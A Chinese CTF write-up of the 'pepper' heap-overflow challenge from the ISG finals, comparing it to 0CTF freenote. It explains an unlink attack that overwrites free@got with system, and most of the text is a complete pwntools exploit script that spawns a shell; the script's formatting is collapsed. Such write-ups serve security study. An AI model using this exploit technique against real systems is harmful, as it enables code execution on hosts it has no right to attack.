这道题目是去年参加ISG决赛时遇到的。二进制文件是有多个漏洞,我们当时是做的栈溢出,而堆溢出一直没有研究过。正好这两天在学习堆溢出,发现这道题和0CTF的freenote十分相似,不愧是同一批人出的题目。所以,在这里简要记录下,因为思路是完全一样的
具体地,通过修改restaurant的功能,我们可以重新编辑restaurant的description。description是保存在堆上的,但在修改时,完全没有考虑新的内容会超过之前分配的大小,于是堆溢出了。与freenote一样,我们写大量的内容到堆上,来构造一系列伪chunks,再通过free时的unlink,来修改某个值。
在unlink检查时,也用的是和freenote一样的方法,即找到某个存有我们伪chunk地址的地方,从那里往前3个指针作为fd,往前2个指针作为bk。freenote里,保存malloc地址的结构数组是存在堆上的,所以那道题我们需要首先得到heap的地址。而pepper这道题,保存所有restaurant结构的数组是在全局变量,已经是固定位置,所以省下了这一环节。
后面的思路就完全一样了。再次修改,使得description指向free@got,并通过读写,将system的地址写到free@got,最后删除时就会调用system了。
下面是具体代码:
#!/usr/bin/env python2frompwnimport*r=remote('127.0.0.1',55555)f=open("payload","wb")defsend(x):r.send(x)f.write(x)defnewItem(length,desc,name="restaurant",address="road",no="1",score=100):r.recvuntil('Your choice: ')send('4\n')r.recvuntil('Input Rest. name(no more than 32 characters): ')send(name+'\n')r.recvuntil('On which road(no more than 128 characters)? ')send(address+'\n')r.recvuntil('Street No? ')send(no+'\n')r.recvuntil('Length of the description of your favourite dish: ')send(str(length)+'\n')r.recvuntil('Input your description:')send(desc+'\n')r.recvuntil('Finally, give a score ;-)')send(str(score)+'\n')defdelItem(i):r.recvuntil('Your choice: ')send('3\n')r.recvuntil('Input the index of Rest. you want to delete: ')send(str(i)+'\n')defshowItem(i):r.recvuntil('Your choice: ')send('2\n')r.recvuntil('Please input the index of the restaurant: ')send(str(i)+'\n')r.recvuntil('Recommended Dish: ')returnr.recvline(keepends=False)defeditItem(i,length,desc,score=100):r.recvuntil('Your choice: ')send('5\n')r.recvuntil('Input the index of Rest. you want to edit: ')send(str(i)+'\n')r.recvuntil('New score XD: ')send(str(score)+'\n')r.recvuntil('Do you want to change the description of the recommended dish(y/n)? ')send("y\n")r.recvuntil('New len: ')send(str(length)+'\n')r.recvuntil('New description: ')send(desc+'\n')defquit():r.recvuntil('Your choice: ')send('6\n')newItem(127,"aaaa")newItem(127,"bbbb")#fd->bk = bk->fd = &ptrptr=0x0804b0a0+4*2fd=ptr-4*3bk=ptr-4*2# crafted chunks# chunk0' starts from &ptr# chunk0 is freechunk0=p32(0)+p32(0x81)+p32(fd)+p32(bk)+"A"*(0x80-4*4)chunk1=p32(0x80)+p32(0x90)+"B"*(0x90-4*2)chunk2=p32(0)+p32(0x91)+"C"*(0x90-4*2)chunk3=p32(0)+p32(0x91)+"D"*(0x90-4*2)chunk=chunk0+chunk1+chunk2+chunk3editItem(0,1000,chunk)# free chunk1, and will result in unlink of chunk0delItem(1)# now restaurant0's description points to 0x0804b09cfreeGot=0x0804b014free2system=-0x38520# will overwrite first 12 bytes of restaurant0 and set its description pointing to free@goteditItem(0,20,p32(0)+p32(100)+p32(20)+p32(freeGot))s=showItem(0)freeAddr=u32((s[:4].ljust(4,'\x00'))[:4])systemAddr=freeAddr+free2systemprint"system is at %s"%hex(systemAddr)# write system to free@goteditItem(0,4,p32(systemAddr))# invoke system("/bin/sh")newItem(20,"/bin/sh")delItem(1)r.interactive()exit(0)所以这道题用的还是unlink。而我看217的writeup里,似乎是通过fastbin来做的,有空再研究下fastbin这种方法。